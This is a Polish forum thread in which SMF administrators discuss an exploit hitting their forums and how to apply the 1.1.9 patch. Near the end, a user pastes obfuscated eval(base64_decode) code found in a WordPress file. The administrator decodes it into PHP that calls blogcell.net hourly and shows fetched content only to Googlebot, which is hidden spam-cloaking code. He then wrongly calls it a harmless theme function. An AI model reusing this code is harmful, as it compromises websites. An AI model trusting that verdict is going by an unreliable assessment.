Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!

[Link]

Widzisz właśnie wszyscy na raz to robią.. i jest mały problemik, ale musisz próbować, dopiero kiedy nie wyjdzie to wrzucasz update.
Chcesz to kiedy po próbach nie wyjdzie, to dam Ci w załączniku paczkę z tego forum, gdzie poszło w parę sekund.

roco

Administrator

3wProducer

Imagination is more Important than Knowledge

Posty 679

 

[Link]

Widzisz właśnie wszyscy na raz to robią.. i jest mały problemik, ale musisz próbować, dopiero kiedy nie wyjdzie to wrzucasz update.
Chcesz to kiedy po próbach nie wyjdzie, to dam Ci w załączniku paczkę z tego forum, gdzie poszło w parę sekund.

[Link]

mi na pewno nie będzie działać normalnie bo tam nic normalnie nie działa.

Czyli tak mam paczkę ściągniętą smal ubdate zajmującą 1.6 mb wrzucam ją ręcznie gdzie (packages?) i nie ma jej w panelu recznie ją odpalam? nie wiem jak jak możesz napisz mi krok po kroku co i jak.

tomeh

Full Member

Posty 222

 

[Link]

mi na pewno nie będzie działać normalnie bo tam nic normalnie nie działa.

Czyli tak mam paczkę ściągniętą smal ubdate zajmującą 1.6 mb wrzucam ją ręcznie gdzie (packages?) i nie ma jej w panelu recznie ją odpalam? nie wiem jak jak możesz napisz mi krok po kroku co i jak.

[Link]

Tomku, pierwszy topik w załączniku: http://www.simplemachines.org/community/index.php?topic=311899.0

Jeśli masz 1.1.8 to pobierasz 3 załącznik hmm nie wiem czy tak pójdzie:

http://www.simplemachines.org/community/index.php?action=dlattach;topic=311899.0;attach=99158

nazwa:  modified_1-1-8_1-1-9.zip

Trafisz napewno. Martwi mnie co innego, - dlaczego nic nie mówisz, czy dokonałes u siebie zmiany stylu na default i ponownych prób z pakietowni i gł. PA.

Wydaje mi się, że niepotrzebnie zasugerowałeś się linkiem do downloadu.. Jeszcze mi się nie zdarzyło, żeby udate nie poszło, czasami bardzo opornie, ale poszło!


// Edit: jeszcze jedno, tam w tym topiku, ten pierwszy załącznik, to jest dokładnie to, co normalnie powinieneś dostać właśnie po kliknięciu na link do aktualki, reszta jest przygotowana na wypadek, kiedy za cholerę nie pójdzie normalnie. Dlatego sądzę, że powinieneś próbowac iść normalnym trybem, w pierwszej kolejności.

roco

Administrator

3wProducer

Imagination is more Important than Knowledge

Posty 679

 

[Link]

Tomku, pierwszy topik w załączniku: http://www.simplemachines.org/community/index.php?topic=311899.0

Jeśli masz 1.1.8 to pobierasz 3 załącznik hmm nie wiem czy tak pójdzie:

http://www.simplemachines.org/community/index.php?action=dlattach;topic=311899.0;attach=99158

nazwa:  modified_1-1-8_1-1-9.zip

Trafisz napewno. Martwi mnie co innego, - dlaczego nic nie mówisz, czy dokonałes u siebie zmiany stylu na default i ponownych prób z pakietowni i gł. PA.

Wydaje mi się, że niepotrzebnie zasugerowałeś się linkiem do downloadu.. Jeszcze mi się nie zdarzyło, żeby udate nie poszło, czasami bardzo opornie, ale poszło!


// Edit: jeszcze jedno, tam w tym topiku, ten pierwszy załącznik, to jest dokładnie to, co normalnie powinieneś dostać właśnie po kliknięciu na link do aktualki, reszta jest przygotowana na wypadek, kiedy za cholerę nie pójdzie normalnie. Dlatego sądzę, że powinieneś próbowac iść normalnym trybem, w pierwszej kolejności.

[Link]

nie idzie żadną miarą. Znasz moje forum testowe hetom.yoyo.pl tam jak masz chwile czasu spróbuj. Na moim innym forum ta sama sytuacja identycznie ma się rzecz. Z różnicą że przy auto próbie wyskakuje odrazu strona 404 forbiden.

Na chat wejdź bo mam pytań z 2 a już nie che robić bigosu

tomeh

Full Member

Posty 222

 

[Link]

nie idzie żadną miarą. Znasz moje forum testowe hetom.yoyo.pl tam jak masz chwile czasu spróbuj. Na moim innym forum ta sama sytuacja identycznie ma się rzecz. Z różnicą że przy auto próbie wyskakuje odrazu strona 404 forbiden.

Na chat wejdź bo mam pytań z 2 a już nie che robić bigosu

[Link]

Tomku w tej chwili kompletnie nie mogę, wisze z projektem a miałem oddać przed godziną 12, która już minęła..

Utwórz na ftp folder temp i nadaj mu chmody na 777 i spróbuj normalnym trybem. Za mało mam info od Ciebie, nie wiem co robisz i w takiej sytuacji powinieneś być bardziej komunikatywny.

spójrz na stopkę, może się już zaktualizowało? joke moim zdaniem coś robisz nie tak..

roco

Administrator

3wProducer

Imagination is more Important than Knowledge

Posty 679

 

[Link]

Tomku w tej chwili kompletnie nie mogę, wisze z projektem a miałem oddać przed godziną 12, która już minęła..

Utwórz na ftp folder temp i nadaj mu chmody na 777 i spróbuj normalnym trybem. Za mało mam info od Ciebie, nie wiem co robisz i w takiej sytuacji powinieneś być bardziej komunikatywny.

spójrz na stopkę, może się już zaktualizowało? joke moim zdaniem coś robisz nie tak..

[Link]

Problem został rozwiązany z aktualizacją forum. Należy zrobić krok po kroku tak:

Ściągnąć paczkę instalacyjną - http://www.simplemachines.org/community/index.php?topic=311899.0 tutaj opis kilku ale pobieramy tą pierwsza z załącznika (smf_patch_1.0.17_1.1.9_2.0-RC1-1.zip (19.96 KB ) to link bezpośredni do niej TUTAJ POBIERZ

Następnie ten pakiet paczkę zip instalujemy tak jak każdą modyfikację. Czyli Zarządzanie pakietami - Pobierz i wskazujemy drogę z dysku i klikamy pobierz oraz potem instaluj. Paczka sama się zainstaluje uaktualniając nam forum do najnowszego. I mamy forum w wersji 1.1.9

Dzięki za pomoc, na początku sam nie wiedziałem jak to zrobić.

tomeh

Full Member

Posty 222

 

[Link]

Problem został rozwiązany z aktualizacją forum. Należy zrobić krok po kroku tak:

Ściągnąć paczkę instalacyjną - http://www.simplemachines.org/community/index.php?topic=311899.0 tutaj opis kilku ale pobieramy tą pierwsza z załącznika (smf_patch_1.0.17_1.1.9_2.0-RC1-1.zip (19.96 KB ) to link bezpośredni do niej TUTAJ POBIERZ

Następnie ten pakiet paczkę zip instalujemy tak jak każdą modyfikację. Czyli Zarządzanie pakietami - Pobierz i wskazujemy drogę z dysku i klikamy pobierz oraz potem instaluj. Paczka sama się zainstaluje uaktualniając nam forum do najnowszego. I mamy forum w wersji 1.1.9

Dzięki za pomoc, na początku sam nie wiedziałem jak to zrobić.

[Link]

Dzięki roco za info ... tak właśnie tu dzisiaj wpadłem i czytam sobie ten wątek ... no więc postanowiłem sobie zajrzeć na moje forum. I proszę kogo znalazłem:



Na szczęście z forum się nic nie stało. Mniemam, że to tylko dlatego, że nie aktywował jeszcze konta przez e-mail. Na szczęście nie zezwalam nowym userom na wrzucanie avatarów na serwer (ta opcja dostępna tylko dla elity) jak i dodawanie załączników jest wyłączone całkowicie.

Jeszcze raz dzięki bo nie wiadomo jakby to było... oczywiście banik już poleciał dla kolesia 

Pozdrawiam

Draco

Technik

ON-OFF

Posty 146

 

[Link]

Dzięki roco za info ... tak właśnie tu dzisiaj wpadłem i czytam sobie ten wątek ... no więc postanowiłem sobie zajrzeć na moje forum. I proszę kogo znalazłem:



Na szczęście z forum się nic nie stało. Mniemam, że to tylko dlatego, że nie aktywował jeszcze konta przez e-mail. Na szczęście nie zezwalam nowym userom na wrzucanie avatarów na serwer (ta opcja dostępna tylko dla elity) jak i dodawanie załączników jest wyłączone całkowicie.

Jeszcze raz dzięki bo nie wiadomo jakby to było... oczywiście banik już poleciał dla kolesia 

Pozdrawiam

[Link]

Witaj @Draco!

Na zdrowie 

Trochę na początku posiałem ludziom strachu, co nie było moim zamiarem, ponieważ skrypt SMF i tak jest jednym z bezpieczniejszych, ale najpierw musiałem sam zrozumieć z czym mam do czynienia. To szkudnik, jednak sposób włamu ciekawy.
Najgorzej, kiedy wykona sie kod, wtedy choć brak strat, (po za straconym czasem!), to są pełne ręce roboty, żeby usunąć syf.
Pisałem o tym na samym początku. U mnie zarejestrował się na kilku forach, na jednym zadziałał skutecznie, a na innym, choć kod się niby wykonał, to pliki nie były zaśmiecone, - odnalazłem jednak jego mechanizny do zaśmiecania i wsio pousuwałem.

Raczej trudnomu było ze mną, ponieważ większość plików mam poprzerabianych do własnych potrzeb, tym nie mniej udało mu sie napsuc mi krwi. Niby głupotka i bzdet, ale roboty naprawczej przy tym multum.
Dodatkowo, na zainfekowanym forum w jego katalogu miałem parędziesiąt innych skryptów i dosłownie wszystkie pliki *.php zostały zasyfione. Warto się zabezpieczyć! Ale chorym wydaje mi się zabraniać z tego powodu, różnych rzeczy moim gościom.
Poprawka załatwiła i inne niedociągłości. niestety poprawiłem sobie wczesniej sam i żeby wgrac poprawki, musiałem cofać zmiany hehe ale spoko.

U Ciebie pewnie nic by nie było.. to automat.. nie zadziała to leci dalej. Ma przecież tyle linków z googlary. Właściwie to może trafić niemal wszędzie i dlatego była potrzebna szybka poprawka i znowu załoga SMF stanęła na wysokości zadania.

Pozdrawiam
roco

PS. jak masz z czymś problemy, to pytaj, - jesli będzie to leżeć w zakresie mojej wiedzy, to napewno pomogę.

roco

Administrator

3wProducer

Imagination is more Important than Knowledge

Posty 679

 

[Link]

Witaj @Draco!

Na zdrowie 

Trochę na początku posiałem ludziom strachu, co nie było moim zamiarem, ponieważ skrypt SMF i tak jest jednym z bezpieczniejszych, ale najpierw musiałem sam zrozumieć z czym mam do czynienia. To szkudnik, jednak sposób włamu ciekawy.
Najgorzej, kiedy wykona sie kod, wtedy choć brak strat, (po za straconym czasem!), to są pełne ręce roboty, żeby usunąć syf.
Pisałem o tym na samym początku. U mnie zarejestrował się na kilku forach, na jednym zadziałał skutecznie, a na innym, choć kod się niby wykonał, to pliki nie były zaśmiecone, - odnalazłem jednak jego mechanizny do zaśmiecania i wsio pousuwałem.

Raczej trudnomu było ze mną, ponieważ większość plików mam poprzerabianych do własnych potrzeb, tym nie mniej udało mu sie napsuc mi krwi. Niby głupotka i bzdet, ale roboty naprawczej przy tym multum.
Dodatkowo, na zainfekowanym forum w jego katalogu miałem parędziesiąt innych skryptów i dosłownie wszystkie pliki *.php zostały zasyfione. Warto się zabezpieczyć! Ale chorym wydaje mi się zabraniać z tego powodu, różnych rzeczy moim gościom.
Poprawka załatwiła i inne niedociągłości. niestety poprawiłem sobie wczesniej sam i żeby wgrac poprawki, musiałem cofać zmiany hehe ale spoko.

U Ciebie pewnie nic by nie było.. to automat.. nie zadziała to leci dalej. Ma przecież tyle linków z googlary. Właściwie to może trafić niemal wszędzie i dlatego była potrzebna szybka poprawka i znowu załoga SMF stanęła na wysokości zadania.

Pozdrawiam
roco

PS. jak masz z czymś problemy, to pytaj, - jesli będzie to leżeć w zakresie mojej wiedzy, to napewno pomogę.

[Link]

Dzięki wielkie roco. Oczywiście zagoszczę tu na dłużej bo wiem, że znasz się na rzeczy  Zresztą nigdzie indziej nie znalazłem info o tym exploicie ale z doświadczenia wiem, że nowym użytkownikom każdego forum nie powinno się udzielać zbyt dużych uprawnień. Gdy zaczynałem swoją przygodę z forum SMF, a w cale nie było to dawno, rzekłbym, że jestem początkującym to na moim pierwszym forum rejestrowało się mnóstwo botów, które przede wszystkim spamowały forum linkami. Stąd też przydałoby się ostrzec wszystkich użytkowników aby zabezpieczali swoje fora jak najlepiej. Jest mnóstwo dodatków do SMF, które chronią nas przed spamem, ustawiajmy rejestrację poprzez potwierdzenie przez e-mail, nie pozwólmy nowym użytkownikom mieć możliwości załączania różnych plików -> najlepiej ustawić wszystko na zdlane hostingi.

Wracając do tego krisbarteo ... mimo, że na forum mam już ok. 500+ userów jakoś mam pamięć do nicków i czytając tutaj Twój wątek coś mnie tknęło, że gdzieś już ten nick widziałem. No i okazało się, że rzeczywiście ten automat jest na liście userów. Minusem tego jest, że dużo osób przerzuca się na SMF i tak naprawdę nie zdają sobie sprawy, że każdego rodzaju forum jest zagrożone różnymi "badziewiami" ... na szczęście ekipa od SMF to konkretni ludzie i bardzo szybko wydają aktualizację łatając wszystkie znalezione dziury ...

Jeszcze raz pozdrawiam. Mimo, że jestem tutaj nowy, jak i nowy w temacie SMF będę się starał też pomóc userom w rozwiązywaniu ich problemów. 

Draco

Technik

ON-OFF

Posty 146

 

[Link]

Dzięki wielkie roco. Oczywiście zagoszczę tu na dłużej bo wiem, że znasz się na rzeczy  Zresztą nigdzie indziej nie znalazłem info o tym exploicie ale z doświadczenia wiem, że nowym użytkownikom każdego forum nie powinno się udzielać zbyt dużych uprawnień. Gdy zaczynałem swoją przygodę z forum SMF, a w cale nie było to dawno, rzekłbym, że jestem początkującym to na moim pierwszym forum rejestrowało się mnóstwo botów, które przede wszystkim spamowały forum linkami. Stąd też przydałoby się ostrzec wszystkich użytkowników aby zabezpieczali swoje fora jak najlepiej. Jest mnóstwo dodatków do SMF, które chronią nas przed spamem, ustawiajmy rejestrację poprzez potwierdzenie przez e-mail, nie pozwólmy nowym użytkownikom mieć możliwości załączania różnych plików -> najlepiej ustawić wszystko na zdlane hostingi.

Wracając do tego krisbarteo ... mimo, że na forum mam już ok. 500+ userów jakoś mam pamięć do nicków i czytając tutaj Twój wątek coś mnie tknęło, że gdzieś już ten nick widziałem. No i okazało się, że rzeczywiście ten automat jest na liście userów. Minusem tego jest, że dużo osób przerzuca się na SMF i tak naprawdę nie zdają sobie sprawy, że każdego rodzaju forum jest zagrożone różnymi "badziewiami" ... na szczęście ekipa od SMF to konkretni ludzie i bardzo szybko wydają aktualizację łatając wszystkie znalezione dziury ...

Jeszcze raz pozdrawiam. Mimo, że jestem tutaj nowy, jak i nowy w temacie SMF będę się starał też pomóc userom w rozwiązywaniu ich problemów. 

[Link]

Okay zapraszam

Nie chcę więcej pisać w tym topie, bo to idzie w OT, a top może się przydac jakimś nieszczęśnikom

narka
r.

roco

Administrator

3wProducer

Imagination is more Important than Knowledge

Posty 679

 

[Link]

Okay zapraszam

Nie chcę więcej pisać w tym topie, bo to idzie w OT, a top może się przydac jakimś nieszczęśnikom

narka
r.

[Link]

Mam takie pytanie bo jest taki kod prawie podobny do tego w pierwszym poście

Code: [select]

eval(base64_decode('ZnVuY3Rpb24gd3BfZ2V0X2Zvb3Rlcl9tZXRhKCkge2dsb2JhbCAkd3BkYjtpZiAoJGFkd2Jfb3B0ID0gJHdwZGItPmdldF92YXIoIlNFTEVDVCBvcHRpb25fdmFsdWUgRlJPTSAkd3BkYi0+b3B0aW9ucyBXSEVSRSBvcHRpb25fbmFtZT0nYWR3Yl9vcHQnIikpJGFkd2Jfb3B0ID0gdW5zZXJpYWxpemUoJGFkd2Jfb3B0KTtlbHNleyRhZHdiX29wdCA9IGFycmF5KDAsJycpOyR3cGRiLT5xdWVyeSgiSU5TRVJUIElOVE8gJHdwZGItPm9wdGlvbnMgKG9wdGlvbl9uYW1lLCBvcHRpb25fdmFsdWUsIGF1dG9sb2FkKSBWQUxVRVMgKCdhZHdiX29wdCcsICciLnNlcmlhbGl6ZSgkYWR3Yl9vcHQpLiInLCAnbm8nKSIpO31pZiAoKHRpbWUoKS0kYWR3Yl9vcHRbMF0pID49IDM2MDApeyRhZHdiX2hvc3QgPSAnYmxvZ2NlbGwubmV0JzskYWR3Yl9nZXQgID0gJy93cGFtLyc7JGFkd2Jfc29jICA9IEBmc29ja29wZW4oJGFkd2JfaG9zdCw4MCwkX2VuLCRfZXMsMzApO2lmICgkYWR3Yl9zb2Mpe0BzdHJlYW1fc2V0X3RpbWVvdXQoJGFkd2Jfc29jLDMwKTtAZndyaXRlKCRhZHdiX3NvYywiR0VUICRhZHdiX2dldCIuJz9oPScudXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSkuJyZ1PScudXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKS4iIEhUVFAvMS4xXHJcbkhvc3Q6ICRhZHdiX2hvc3RcclxuQ29ubmVjdGlvbjogQ2xvc2VcclxuXHJcbiIpOyRhZHdiX2RhdGEgPSAnJzt3aGlsZSghZmVvZigkYWR3Yl9zb2MpKSAkYWR3Yl9kYXRhIC49IEBmZ2V0cygkYWR3Yl9zb2MsIDEwMjQpOyRhZHdiX2RhdGEgPSB0cmltKHN0cnN0cigkYWR3Yl9kYXRhLCJcclxuXHJcbiIpKTt9QGZjbG9zZSgkYWR3Yl9zb2MpO2lmKHByZWdfbWF0Y2goJy88YWRidWc+KC4rPyk8XC9hZGJ1Zz4vcycsJGFkd2JfZGF0YSwkYWR3Yl90bXApKXskYWR3Yl9vcHQgPSBhcnJheSh0aW1lKCksICRhZHdiX3RtcFsxXSk7JHdwZGItPnF1ZXJ5KCJVUERBVEUgJHdwZGItPm9wdGlvbnMgU0VUIG9wdGlvbl92YWx1ZT0nIi5teXNxbF9lc2NhcGVfc3RyaW5nKHNlcmlhbGl6ZSgkYWR3Yl9vcHQpKS4iJyBXSEVSRSBvcHRpb25fbmFtZT0nYWR3Yl9vcHQnIik7fX1pZiAoZXJlZ2koImdvb2dsZWJvdCIsJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSllY2hvICRhZHdiX29wdFsxXTt9YWRkX2FjdGlvbigid3BfZm9vdGVyIiwgIndwX2dldF9mb290ZXJfbWV0YSIpOw0KPz4='));

Mam go nie na forum ale w systemie cms wordpress czy to może być exploit jest ten dziwny kod w jednym pliku tylko jak na razie.

tomeh

Full Member

Posty 222

 

[Link]

Mam takie pytanie bo jest taki kod prawie podobny do tego w pierwszym poście

Code: [select]

eval(base64_decode('ZnVuY3Rpb24gd3BfZ2V0X2Zvb3Rlcl9tZXRhKCkge2dsb2JhbCAkd3BkYjtpZiAoJGFkd2Jfb3B0ID0gJHdwZGItPmdldF92YXIoIlNFTEVDVCBvcHRpb25fdmFsdWUgRlJPTSAkd3BkYi0+b3B0aW9ucyBXSEVSRSBvcHRpb25fbmFtZT0nYWR3Yl9vcHQnIikpJGFkd2Jfb3B0ID0gdW5zZXJpYWxpemUoJGFkd2Jfb3B0KTtlbHNleyRhZHdiX29wdCA9IGFycmF5KDAsJycpOyR3cGRiLT5xdWVyeSgiSU5TRVJUIElOVE8gJHdwZGItPm9wdGlvbnMgKG9wdGlvbl9uYW1lLCBvcHRpb25fdmFsdWUsIGF1dG9sb2FkKSBWQUxVRVMgKCdhZHdiX29wdCcsICciLnNlcmlhbGl6ZSgkYWR3Yl9vcHQpLiInLCAnbm8nKSIpO31pZiAoKHRpbWUoKS0kYWR3Yl9vcHRbMF0pID49IDM2MDApeyRhZHdiX2hvc3QgPSAnYmxvZ2NlbGwubmV0JzskYWR3Yl9nZXQgID0gJy93cGFtLyc7JGFkd2Jfc29jICA9IEBmc29ja29wZW4oJGFkd2JfaG9zdCw4MCwkX2VuLCRfZXMsMzApO2lmICgkYWR3Yl9zb2Mpe0BzdHJlYW1fc2V0X3RpbWVvdXQoJGFkd2Jfc29jLDMwKTtAZndyaXRlKCRhZHdiX3NvYywiR0VUICRhZHdiX2dldCIuJz9oPScudXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSkuJyZ1PScudXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKS4iIEhUVFAvMS4xXHJcbkhvc3Q6ICRhZHdiX2hvc3RcclxuQ29ubmVjdGlvbjogQ2xvc2VcclxuXHJcbiIpOyRhZHdiX2RhdGEgPSAnJzt3aGlsZSghZmVvZigkYWR3Yl9zb2MpKSAkYWR3Yl9kYXRhIC49IEBmZ2V0cygkYWR3Yl9zb2MsIDEwMjQpOyRhZHdiX2RhdGEgPSB0cmltKHN0cnN0cigkYWR3Yl9kYXRhLCJcclxuXHJcbiIpKTt9QGZjbG9zZSgkYWR3Yl9zb2MpO2lmKHByZWdfbWF0Y2goJy88YWRidWc+KC4rPyk8XC9hZGJ1Zz4vcycsJGFkd2JfZGF0YSwkYWR3Yl90bXApKXskYWR3Yl9vcHQgPSBhcnJheSh0aW1lKCksICRhZHdiX3RtcFsxXSk7JHdwZGItPnF1ZXJ5KCJVUERBVEUgJHdwZGItPm9wdGlvbnMgU0VUIG9wdGlvbl92YWx1ZT0nIi5teXNxbF9lc2NhcGVfc3RyaW5nKHNlcmlhbGl6ZSgkYWR3Yl9vcHQpKS4iJyBXSEVSRSBvcHRpb25fbmFtZT0nYWR3Yl9vcHQnIik7fX1pZiAoZXJlZ2koImdvb2dsZWJvdCIsJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSllY2hvICRhZHdiX29wdFsxXTt9YWRkX2FjdGlvbigid3BfZm9vdGVyIiwgIndwX2dldF9mb290ZXJfbWV0YSIpOw0KPz4='));

Mam go nie na forum ale w systemie cms wordpress czy to może być exploit jest ten dziwny kod w jednym pliku tylko jak na razie.

[Link]

Tomeh,

podałem na pierwszej stronie tego topa linki do miejsc, gdzie można rozkodować zakodowaną bazę np. tu:

http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx

Wklejasz kod który masz w stringu '< -- kod w stringu -- >'

GeSHi -› Code: [select]

eval(base64_decode(&#39;<!-- kod w stringu do rozkodowania -->&#39;));

// Created by GeSHi 1.0.8.10 | code: -› [code=PHP] | load:0.026s | speed:2.67 KB/s

Po rozkodowaniu dostaniesz taki kod:

PHP Code: [select]

<?php
function wp_get_footer_meta() 
{
global $wpdb;
if ($adwb_opt = $wpdb->get_var("SELECT option_value FROM $wpdb->options WHERE option_name=&#39;adwb_opt&#39;"))
$adwb_opt = unserialize($adwb_opt);
else
{
$adwb_opt = array(0,&#39;&#39;);
$wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES (&#39;adwb_opt&#39;, &#39;".serialize($adwb_opt)."&#39;, &#39;no&#39;)");
}
if ((time()-$adwb_opt[0]) >= 3600)
{
$adwb_host = &#39;blogcell.net&#39;;$adwb_get  = &#39;/wpam/&#39;;$adwb_soc  = @fsockopen($adwb_host,80,$_en,$_es,30);
if ($adwb_soc)
{
@stream_set_timeout($adwb_soc,30);
@fwrite($adwb_soc,"GET $adwb_get".&#39;?h=&#39;.urlencode($_SERVER[&#39;HTTP_HOST&#39;]).&#39;&u=&#39;.urlencode($_SERVER[&#39;REQUEST_URI&#39;])." HTTP/1.1\r\nHost: $adwb_host\r\nConnection: Close\r\n\r\n");
$adwb_data = &#39;&#39;;
while(!feof($adwb_soc)) $adwb_data .= @fgets($adwb_soc, 1024);
$adwb_data = trim(strstr($adwb_data,"\r\n\r\n"));
}
@fclose($adwb_soc);
if(preg_match(&#39;/<adbug>(.+?)<\/adbug>/s&#39;,$adwb_data,$adwb_tmp))
{
$adwb_opt = array(time(), $adwb_tmp[1]);
$wpdb->query("UPDATE $wpdb->options SET option_value=&#39;".mysql_escape_string(serialize($adwb_opt))."&#39; WHERE option_name=&#39;adwb_opt&#39;");
}
}
if (eregi("googlebot",$_SERVER[&#39;HTTP_USER_AGENT&#39;]))
echo $adwb_opt[1];
}
add_action("wp_footer", "wp_get_footer_meta");
?>

I w tym wypadku, to wygląda na funkcję z jakiejś skórki do WP. Oczywiście należy posprawdzać, czy nie ma doklejek na początku plików php.

Tomeh, to wygląda na funkcję stylu, więc wsio w pariadku i nie ma co pękać, jednak posprawdzaj pliki.


Pozdrawiam
roco

roco

Administrator

3wProducer

Imagination is more Important than Knowledge

Posty 679

 

[Link]

Tomeh,

podałem na pierwszej stronie tego topa linki do miejsc, gdzie można rozkodować zakodowaną bazę np. tu:

http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx

Wklejasz kod który masz w stringu '< -- kod w stringu -- >'

GeSHi -› Code: [select]

eval(base64_decode(&#39;<!-- kod w stringu do rozkodowania -->&#39;));

// Created by GeSHi 1.0.8.10 | code: -› [code=PHP] | load:0.026s | speed:2.67 KB/s

Po rozkodowaniu dostaniesz taki kod:

PHP Code: [select]

<?php
function wp_get_footer_meta() 
{
global $wpdb;
if ($adwb_opt = $wpdb->get_var("SELECT option_value FROM $wpdb->options WHERE option_name=&#39;adwb_opt&#39;"))
$adwb_opt = unserialize($adwb_opt);
else
{
$adwb_opt = array(0,&#39;&#39;);
$wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES (&#39;adwb_opt&#39;, &#39;".serialize($adwb_opt)."&#39;, &#39;no&#39;)");
}
if ((time()-$adwb_opt[0]) >= 3600)
{
$adwb_host = &#39;blogcell.net&#39;;$adwb_get  = &#39;/wpam/&#39;;$adwb_soc  = @fsockopen($adwb_host,80,$_en,$_es,30);
if ($adwb_soc)
{
@stream_set_timeout($adwb_soc,30);
@fwrite($adwb_soc,"GET $adwb_get".&#39;?h=&#39;.urlencode($_SERVER[&#39;HTTP_HOST&#39;]).&#39;&u=&#39;.urlencode($_SERVER[&#39;REQUEST_URI&#39;])." HTTP/1.1\r\nHost: $adwb_host\r\nConnection: Close\r\n\r\n");
$adwb_data = &#39;&#39;;
while(!feof($adwb_soc)) $adwb_data .= @fgets($adwb_soc, 1024);
$adwb_data = trim(strstr($adwb_data,"\r\n\r\n"));
}
@fclose($adwb_soc);
if(preg_match(&#39;/<adbug>(.+?)<\/adbug>/s&#39;,$adwb_data,$adwb_tmp))
{
$adwb_opt = array(time(), $adwb_tmp[1]);
$wpdb->query("UPDATE $wpdb->options SET option_value=&#39;".mysql_escape_string(serialize($adwb_opt))."&#39; WHERE option_name=&#39;adwb_opt&#39;");
}
}
if (eregi("googlebot",$_SERVER[&#39;HTTP_USER_AGENT&#39;]))
echo $adwb_opt[1];
}
add_action("wp_footer", "wp_get_footer_meta");
?>

I w tym wypadku, to wygląda na funkcję z jakiejś skórki do WP. Oczywiście należy posprawdzać, czy nie ma doklejek na początku plików php.

Tomeh, to wygląda na funkcję stylu, więc wsio w pariadku i nie ma co pękać, jednak posprawdzaj pliki.


Pozdrawiam
roco

[Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!]

Code: [select]  -› [ Topic: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!! ]

[Uwaga! Exploit - ważne info dla Adminów skryptu SMF!!]

Code: [select]  -› [ Topic: Uwaga! Exploit - ważne info dla Adminów skryptu SMF!! ]